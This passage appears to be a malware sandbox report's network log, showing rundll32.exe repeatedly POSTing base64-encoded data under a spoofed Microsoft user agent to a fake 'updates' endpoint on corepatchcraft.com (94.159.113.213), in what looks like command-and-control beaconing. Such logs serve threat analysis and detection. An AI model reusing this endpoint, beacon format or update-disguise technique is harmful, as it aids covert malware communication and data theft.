                        Date: Thu, 16 Jan 2025 05:02:16 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:16 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.66083994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:17 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:17 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:17 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:17 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:17 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.66084894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:18 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:18 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:19 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:18 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:19 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.66085494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:19 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:19 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:20 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:20 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.66086494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:21 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:21 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:21 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:21 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:21 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.66087394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:22 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:22 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:23 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:22 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:23 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.66088094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:24 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:24 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:24 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:24 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:24 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.66088894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:25 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:25 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:25 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:25 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.66089694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:26 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:26 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:27 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:26 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:27 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.66090594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:27 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:27 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:28 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:28 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:28 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.66091194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:29 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:29 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:29 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:29 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:29 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.66091994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:30 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:30 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:31 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:30 GMT
